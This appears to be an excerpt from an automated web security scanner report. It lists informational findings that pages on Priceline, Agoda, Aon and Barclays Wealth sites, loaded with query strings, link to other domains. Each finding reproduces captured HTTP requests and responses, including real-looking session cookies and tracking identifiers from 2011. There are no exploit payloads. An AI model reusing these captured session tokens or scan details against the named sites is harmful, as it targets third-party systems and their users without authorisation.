<li class="last"><a href="http://findgroupdeals.hotelplanner.com/Priceline.cfm?sc=PCLN_HomeTopNav">group travel</a>
...[SNIP]...
<li><a href="http://www.hotelroom.com/">Hotel Room</a>
...[SNIP]...
<li><a href="http://www.comparediscounthotels.com/">Discount Hotels</a>
...[SNIP]...
<li><a href="http://www.airfares.com/">Cheap Airfares</a>
...[SNIP]...
<li><a href="http://www.hotelsbycity.net">Cheap Hotels</a>
...[SNIP]...
<li><a href="http://www.agoda.com">Agoda.com</a>
...[SNIP]...
<li><a href="http://www.booking.com">Booking.com</a>
...[SNIP]...
<li class="last"><a title="MyTravelGuide.com" href="http://www.mytravelguide.com">Travel Guides</a>
...[SNIP]...
<li><a href="http://www.pricelinepartnernetwork.com/">hotel affiliate program</a>
...[SNIP]...
<li><a href="http://www.rentalcars.com/rental-car-affiliate-program/">rental car affiliate program</a>
...[SNIP]...
<div style="float: right; padding-top: 5px;">
       <a href="http://www.facebook.com/priceline.negotiator" target="_blank" title="Follow the Negotiator on Facebook">
           <img alt="" src="/sharedapps/content/graphics/fb_btm_nav.gif" border="0" />
...[SNIP]...
</a>
       &nbsp;
       <a href="http://twitter.com/TheNegotiator" target="_blank" title="Follow the Negotiator on Twitter">
           <img alt="" src="/sharedapps/content/graphics/tw_btm_nav.gif" border="0" />
...[SNIP]...
<!-- ATG_AVAILABLE_A20 -->

<script type="text/javascript" src="//static.atgsvcs.com/js/atgsvcs.js"></script>
...[SNIP]...
19.172. http://travela.priceline.com/hotel/searchHotels.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

POST /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Content-Length: 282
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

checkInDate=10%2F04%2F11&CkInMonth=10&CkInDay=04&CkInYear=2011&checkOutDate=10%2F07%2F11&CkOutMonth=10&CkOutDay=07&CkOutYear=2011&homepage=Y&Initialized=Y&cityName=Boston%2CUnited+States&otherCityName
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:10:05 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5564010a5463010a2011100300100584c011561872; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A10%3A05&ID=IGOUGO&PRODUCTID=&SOURCEID=PL; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:10:05 GMT; Path=/
Set-Cookie: JSESSIONID=6F97BAD3EA8636704D7EC7753CCBB4DE; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8901
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<NOSCRIPT>
<IMG SRC="http://ad.doubleclick.net/ad/priceline.dart/waitpage_hotel;sz=583x80;ord=123456789?" WIDTH="583" HEIGHT="80" BORDER="0">
</NOSCRIPT>
...[SNIP]...
19.173. http://travela.priceline.com/hotel/searchResults.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchResults.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /hotel/searchResults.do?jsk=4663010a5564010a20111003003755e18011569968&key=gtaqdik9&showDP=y&NYOPRedirNI=null HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchHotels.do?session_key=711510AC721510AC2011100300374475eeb1270807&plf=pclh&INIT_SESSION=true&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH&searchType=CITY&cityName=bos&numberOfRooms=1&hotelBrand=&searchHotelName=&starRating=-1&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011&KMode=Y&selectedTab=0&passingValues=YES&affiliateSubID=514A
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FAF2D4913A438B844DA81A6F80DA0319; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602255259:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.3.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; JSessionKey=4663010a5564010a20111003003755e18011569968; Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A37%3A55&ID=AWAYNETWORK&PRODUCTID=&SOURCEID=PL; PSessKey=

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:40:29 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Vary: Accept-Encoding
Content-Type: text/html;;charset=iso-8859-1
Content-Length: 464319


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
<NOSCRIPT>
   <A HREF="http://ad.doubleclick.net/N3102/jump/priceline.dart/hotel_search_results;city=boston;state=massachusetts;country=united_states;sz=728x90;ord=6698044948427484?">
   <IMG SRC="http://ad.doubleclick.net/N3102/ad/priceline.dart/hotel_search_results;city=boston;state=massachusetts;country=united_states;sz=728x90;ord=6698044948427484?" border="0" height="90" width="728" alt=""></A>
...[SNIP]...
<li class="last"><a href="http://findgroupdeals.hotelplanner.com/Priceline.cfm?sc=PCLN_HomeTopNav">groups</a>
...[SNIP]...
</SCRIPT>
<SCRIPT SRC="http://an.tacoda.net/an/17799/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
<div class="app">
       <a href="http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewSoftware?id=336381998&amp;mt=8" onclick="gf_CallExitTracker('/3v3nt/default/nav_bottom/click/iphoneapp');" target="_blank">
       <img width="98" height="34" border="0" src="/hotel/content/graphics/iphone-badge.gif" alt="available on the App Store"/>
...[SNIP]...
<li class="last"><a href="http://findgroupdeals.hotelplanner.com/Priceline.cfm?sc=PCLN_HomeTopNav">group travel</a>
...[SNIP]...
<li><a href="http://www.hotelroom.com/">Hotel Room</a>
...[SNIP]...
<li><a href="http://www.comparediscounthotels.com/">Discount Hotels</a>
...[SNIP]...
<li><a href="http://www.airfares.com/">Cheap Airfares</a>
...[SNIP]...
<li><a href="http://www.hotelsbycity.net">Cheap Hotels</a>
...[SNIP]...
<li><a href="http://www.agoda.com">Agoda.com</a>
...[SNIP]...
<li><a href="http://www.booking.com">Booking.com</a>
...[SNIP]...
<li class="last"><a title="MyTravelGuide.com" href="http://www.mytravelguide.com">Travel Guides</a>
...[SNIP]...
<li><a href="http://www.pricelinepartnernetwork.com/">hotel affiliate program</a>
...[SNIP]...
<li><a href="http://www.rentalcars.com/rental-car-affiliate-program/">rental car affiliate program</a>
...[SNIP]...
<div style="float: right; padding-top: 5px;">
       <a href="http://www.facebook.com/priceline.negotiator" target="_blank" title="Follow the Negotiator on Facebook">
           <img alt="" src="/sharedapps/content/graphics/fb_btm_nav.gif" border="0" />
...[SNIP]...
</a>
       &nbsp;
       <a href="http://twitter.com/TheNegotiator" target="_blank" title="Follow the Negotiator on Twitter">
           <img alt="" src="/sharedapps/content/graphics/tw_btm_nav.gif" border="0" />
...[SNIP]...
<!-- ATG_AVAILABLE_A20 -->

<script type="text/javascript" src="//static.atgsvcs.com/js/atgsvcs.js"></script>
...[SNIP]...
19.174. http://travela.priceline.com/hotel/searchResults.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchResults.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /hotel/searchResults.do?jsk=5463010a5064010a2011100300091519d011589950&key=gtapcnq5&showDP=y&NYOPRedirNI=null HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=58AA51FFBF9D4E024C54F62C7478894F; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; vsch=v2011100300090989417126%5F98264026; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; JSessionKey=5463010a5064010a2011100300091519d011589950; Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A09%3A15&ID=IGOUGO&PRODUCTID=&SOURCEID=PL; PSessKey=

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:11:15 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=A33FF447E496BF38ED169D142CD825A3; Path=/hotel
Vary: Accept-Encoding
Content-Type: text/html;;charset=iso-8859-1
Content-Length: 491022


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
<NOSCRIPT>
   <A HREF="http://ad.doubleclick.net/N3102/jump/priceline.dart/hotel_search_results;city=boston;state=massachusetts;country=united_states;sz=728x90;ord=6586420485841045?">
   <IMG SRC="http://ad.doubleclick.net/N3102/ad/priceline.dart/hotel_search_results;city=boston;state=massachusetts;country=united_states;sz=728x90;ord=6586420485841045?" border="0" height="90" width="728" alt=""></A>
...[SNIP]...
<li class="last"><a href="http://findgroupdeals.hotelplanner.com/Priceline.cfm?sc=PCLN_HomeTopNav">groups</a>
...[SNIP]...
</SCRIPT>
<SCRIPT SRC="http://an.tacoda.net/an/17799/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
<div class="app">
       <a href="http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewSoftware?id=336381998&amp;mt=8" onclick="gf_CallExitTracker('/3v3nt/default/nav_bottom/click/iphoneapp');" target="_blank">
       <img width="98" height="34" border="0" src="/hotel/content/graphics/iphone-badge.gif" alt="available on the App Store"/>
...[SNIP]...
<li class="last"><a href="http://findgroupdeals.hotelplanner.com/Priceline.cfm?sc=PCLN_HomeTopNav">group travel</a>
...[SNIP]...
<li><a href="http://www.hotelroom.com/">Hotel Room</a>
...[SNIP]...
<li><a href="http://www.comparediscounthotels.com/">Discount Hotels</a>
...[SNIP]...
<li><a href="http://www.airfares.com/">Cheap Airfares</a>
...[SNIP]...
<li><a href="http://www.hotelsbycity.net">Cheap Hotels</a>
...[SNIP]...
<li><a href="http://www.agoda.com">Agoda.com</a>
...[SNIP]...
<li><a href="http://www.booking.com">Booking.com</a>
...[SNIP]...
<li class="last"><a title="MyTravelGuide.com" href="http://www.mytravelguide.com">Travel Guides</a>
...[SNIP]...
<li><a href="http://www.pricelinepartnernetwork.com/">hotel affiliate program</a>
...[SNIP]...
<li><a href="http://www.rentalcars.com/rental-car-affiliate-program/">rental car affiliate program</a>
...[SNIP]...
<div style="float: right; padding-top: 5px;">
       <a href="http://www.facebook.com/priceline.negotiator" target="_blank" title="Follow the Negotiator on Facebook">
           <img alt="" src="/sharedapps/content/graphics/fb_btm_nav.gif" border="0" />
...[SNIP]...
</a>
       &nbsp;
       <a href="http://twitter.com/TheNegotiator" target="_blank" title="Follow the Negotiator on Twitter">
           <img alt="" src="/sharedapps/content/graphics/tw_btm_nav.gif" border="0" />
...[SNIP]...
<!-- ATG_AVAILABLE_A20 -->

<script type="text/javascript" src="//static.atgsvcs.com/js/atgsvcs.js"></script>
...[SNIP]...
19.175. http://www.agoda.com/pages/agoda/default/page_AdScript.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.agoda.com
Path:   /pages/agoda/default/page_AdScript.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pages/agoda/default/page_AdScript.aspx?type=R&pagetypeid=1&conversionID=985248306&conversionLabel=M6MLCJbtiQIQsuTm1QM&_=1317602266727 HTTP/1.1
Host: www.agoda.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.agoda.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=usyvurhj5s34qtup52oltx1d; agoda.version.02=CookieId=7523af68-b979-4a5c-9566-6cdf92488e9a&AllocId=7e8ed96e55a1afa44758a9a3548685a805d33aa9e52f062bd12dd4c14f0443858201818dc947029deb77f5ece1dfdd8b53ce5b4bcaab65f1374e65c5c00ce5341e3516961f3b6a770dff9a5728226b6f70b9ec62c57523af68b979a5c5666cdf92488e9a&TItems=2$1444075$10-03-2011 07:37$10-02-2012 07:37$; agodalbny=www.agoda.com_cluster_31; __utma=1.939961377.1317602256.1317602256.1317602256.1; __utmb=1.1.10.1317602256; __utmc=1; __utmz=1.1317602256.1.1.utmcsr=trip.com|utmccn=(referral)|utmcmd=referral|utmcct=/hotels.html

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Date: Mon, 03 Oct 2011 00:39:13 GMT
Content-Length: 329
Cache-Control: no-cache, no-store, must-revalidate, proxy-revalidate


<html xmlns="http://www.w3.org/1999/xhtml">
<head></head>
<body>
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://googleads.g.doubleclick.net/pagead/viewthroughconversion/985248306/?label=M6MLCJbtiQIQsuTm1QM&guid=ON&script=0" />
</div>
...[SNIP]...
19.176. http://www.aon.com/site/search.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aon.com
Path:   /site/search.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /site/search.jsp?entqr=3&output=xml_no_dtd&entspa=a&sort=date%3AD%3AL%3Ad1&client=default_frontend&ud=1&oe=UTF-8&ie=UTF-8&OPN=RT1&num=5&start=0&site=AONCOM_ENGLISH&q=xss+txt+css+img+help+faq&x=7&y=9 HTTP/1.1
Host: www.aon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.aon.com/site/products-services.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FDA5F4B4BB1AB049D12027B006BB7DA5; s_pers=%20gpv_pageName%3D/site/products-services.jsp%7C1317601842083%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daoncomprod%253D%252526pid%25253D/site/products-services.jsp%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.aon.com/siteImages/search_btn.gif%252526ot%25253DIMAGE%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Date: Mon, 03 Oct 2011 00:01:43 GMT
Content-Length: 83533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<li class="sub"><a href="http://www.aon-esolutions.com" target="_blank">Aon RiskConsole</a>
...[SNIP]...
<li class="sub"><a href="http://www.aon-esolutions.com" target="_blank">Aon SafetyLogic</a>
...[SNIP]...
<li class="sub"><a href="http://www.aon-esolutions.com" target="_blank">iVOS</a>
...[SNIP]...
<li class="sub"><a href="http://www.inpoint.com" target="_blank">Inpoint</a>
...[SNIP]...
<li><a href="http://www.aon-esolutions.com" target="_blank">Aon RiskConsole</a>
...[SNIP]...
<li><a href="http://www.aon-esolutions.com" target="_blank">Aon SafetyLogic</a>
...[SNIP]...
<li><a href="http://www.inpoint.com" target="_blank">Inpoint</a>
...[SNIP]...
<li><a href="http://www.aon-esolutions.com" target="_blank">iVOS</a>
...[SNIP]...
<li><a href="http://aon.mediaroom.com/">Media Room</a>
...[SNIP]...
<!-- Footer Images -->
   
       
               <a href="http://www.facebook.com/group.php?gid=19094177616" target='_blank'><img src="/siteImages/social_media_icons/facebook.jpg" alt="Facebook" /></a>
       
   
                       <a href="http://www.twitter.com/AonCorp"><img src="/siteImages/social_media_icons/twitter.jpg" alt="Twitter" /></a>
       
   
                       <a href="http://www.linkedin.com/company/2041" target='_blank'><img src="/siteImages/social_media_icons/linkedin.jpg" alt="LinkedIn" />
...[SNIP]...
19.177. http://www.barclayswealth.com/international/foreign-exchange-affiliates.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.barclayswealth.com
Path:   /international/foreign-exchange-affiliates.htm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /international/foreign-exchange-affiliates.htm?WT.mc_ID=DISP_Premiership_080711 HTTP/1.1
Host: www.barclayswealth.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://cdn.flashtalking.com/xre/18/183799/231524/swf/Barclays_wealth_dynamic_300x250.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
content-type: text/html
date: Sun, 02 Oct 2011 23:58:03 GMT
etag: W/"b711-4e8319e9"
last-modified: Wed, 28 Sep 2011 12:58:17 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
vary: accept-encoding
cache-control: public,max-age=3600
Content-Length: 46865

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<head>
...[SNIP]...
<li>
<a href="http://www.stockbrokers.barclays.co.uk/barx/loginToBARX.htm">BARXdirect</a>
...[SNIP]...
<li>
<a href="https://www.stockbrokers.barclays.co.uk/idv/Login1.asp?category=home&amp;usecase=login&amp;popup=&amp;">Barclays Stockbrokers</a>
...[SNIP]...
<li>
<a href="https://www.gerrard.com/clientcentre/login.aspx">Gerrard Client Centre</a>
...[SNIP]...
<li>
<a href="https://www.barclayswealth.hk/onlinebanking">Hong Kong Online Banking</a>
...[SNIP]...
<li>
<a title="Singapore Wealth Online Banking" href="https://www.barclayswealth.sg/onlinebanking/">Singapore Online Banking</a>
...[SNIP]...
<li>
<a href="https://ecommerce.barcap.com/trader/efxdealer/">e-FX Dealer</a>
...[SNIP]...
<li>
<a href="https://www.barclayswealth.hk/onlinebanking">Hong Kong Online Banking</a>
...[SNIP]...
<li>
<a title="Singapore Wealth Online Banking" href="https://www.barclayswealth.sg/onlinebanking/">Singapore Online Banking</a>
...[SNIP]...
<li>
<a href="https://www.barclayswealth.ch/onlinebanking/">Switzerland Online Banking</a>
...[SNIP]...
<!-- Advertiser 'UK Barclays Wealth c/o Sapient UK', Include user in segment 'Barclays Wealth Test Pixel' - DO NOT MODIFY THIS PIXEL IN ANY WAY --> <img src="http://ad.yieldmanager.com/pixel?id=1020665&amp;t=2" width="1" height="1" /> <!-- End of segment tag --> <img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1054619413/?label=uM-qCK-Q2gEQle7w9gM&amp;guid=ON&amp;script=0" /> <!-- Advertiser 'UK Barclays Wealth c/o Sapient UK', Conversion tracking 'Barclays_Wealth_News Letter Signup' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<img src="http://ad.yieldmanager.com/pixel?id=945912&amp;t=2" width="1" height="1" /> <!-- End of conversion tag -->
...[SNIP]...
<p>
<a title="Apply now" href="https://applyinternational.barclays.com/op/getting-started.html?{RDhref+}t=1302004293"><img src="/Images/bwi_btn_apply_now_white.png" />
...[SNIP]...
<p>
<a title="Apply now" href="https://applyinternational.barclays.com/op/getting-started.html?{RDhref+}t=1302004293"><img src="/Images/bwi_btn_apply_now_white.png" />
...[SNIP]...
<li>
<a title="The basics of FX [video opens in a new window]" onclick="window.open (this.href, &#39;child&#39;); return false" href="http://video.streamlevel.com/barclays/video1_start.html">The basics of foreign exchange</a>
...[SNIP]...
<li>
<a title="I want to buy a house in another currency [video opens in a new window]" onclick="window.open (this.href, &#39;child&#39;); return false" href="http://video.streamlevel.com/barclays/video2_start.html">I want to buy a house in another currency</a>
...[SNIP]...
<p>
<a title="Apply now" href="https://applyinternational.barclays.com/op/getting-started.html?{RDhref+}t=1302004293"><img src="/Images/bwi_btn_apply_now_white.png" />
...[SNIP]...
<div>
<img alt="DCSIMG" id="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com/dcs0sd6z700000cpbndecaa4f_6n9k/njs.gif?dcsuri=/nojavascript&amp;WT.js=No&amp;WT.tv=8.6.2" />
</div>
...[SNIP]...
19.178. http://www.barclayswealth.com/international/i-alert.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.barclayswealth.com
Path:   /international/i-alert.htm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /international/i-alert.htm?WT.mc_id=int_q3_ialert_bwi&WT.mc_ev=click HTTP/1.1
Host: www.barclayswealth.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.barclayswealth.com/Images/iAlert-Q32011_567x140.SWF
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PD_STATEFUL_f8c38b02-59b3-11de-be40-001a64b96864=%2F; BIGipServerwpl_GRN_TEST3_static_http_pool=1948654764.14535.0000; sifrFetch=true; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317619786708:ss=1317617886010; __utma=1.1111853373.1317599886.1317599886.1317599886.1; __utmb=1.13.10.1317599886; __utmc=1; __utmz=1.1317599886.1.1.utmcsr=cdn.flashtalking.com|utmccn=(referral)|utmcmd=referral|utmcct=/xre/18/183799/231524/swf/Barclays_wealth_dynamic_300x250.swf; __utma=1.1111853373.1317599886.1317599886.1317599886.1; __utmb=1.14.10.1317599886; __utmc=1; __utmz=1.1317599886.1.1.utmcsr=cdn.flashtalking.com|utmccn=(referral)|utmcmd=referral|utmcct=/xre/18/183799/231524/swf/Barclays_wealth_dynamic_300x250.swf; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a031a36ee; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d02420171; _wt.mode-79569=fcdcc722e93200db2e76

Response

HTTP/1.1 200 OK
content-type: text/html
date: Mon, 03 Oct 2011 00:31:31 GMT
etag: W/"954f-4e79af98"
last-modified: Wed, 21 Sep 2011 09:34:16 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
vary: accept-encoding
cache-control: public,max-age=3600
Content-Length: 38223

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<head>
...[SNIP]...
<li>
<a href="http://www.stockbrokers.barclays.co.uk/barx/loginToBARX.htm">BARXdirect</a>
...[SNIP]...
<li>
<a href="https://www.stockbrokers.barclays.co.uk/idv/Login1.asp?category=home&amp;usecase=login&amp;popup=&amp;">Barclays Stockbrokers</a>
...[SNIP]...
<li>
<a href="https://www.gerrard.com/clientcentre/login.aspx">Gerrard Client Centre</a>
...[SNIP]...
<li>
<a href="https://www.barclayswealth.hk/onlinebanking">Hong Kong Online Banking</a>
...[SNIP]...
<li>
<a title="Singapore Wealth Online Banking" href="https://www.barclayswealth.sg/onlinebanking/">Singapore Online Banking</a>
...[SNIP]...
<li>
<a href="https://ecommerce.barcap.com/trader/efxdealer/">e-FX Dealer</a>
...[SNIP]...
<li>
<a href="https://www.barclayswealth.hk/onlinebanking">Hong Kong Online Banking</a>
...[SNIP]...
<li>
<a title="Singapore Wealth Online Banking" href="https://www.barclayswealth.sg/onlinebanking/">Singapore Online Banking</a>
...[SNIP]...
<li>
<a href="https://www.barclayswealth.ch/onlinebanking/">Switzerland Online Banking</a>
...[SNIP]...
<!-- Advertiser 'UK Barclays Wealth c/o Sapient UK', Include user in segment 'Barclays Wealth Test Pixel' - DO NOT MODIFY THIS PIXEL IN ANY WAY --><img src="http://ad.yieldmanager.com/pixel?id=1020665&amp;t=2" width="1" height="1" /> <!-- End of segment tag --> <img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1054619413/?label=uM-qCK-Q2gEQle7w9gM&amp;guid=ON&amp;script=0" /> <!-- Advertiser 'UK Barclays Wealth c/o Sapient UK', Conversion tracking 'Barclays_Wealth_News Letter Signup' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
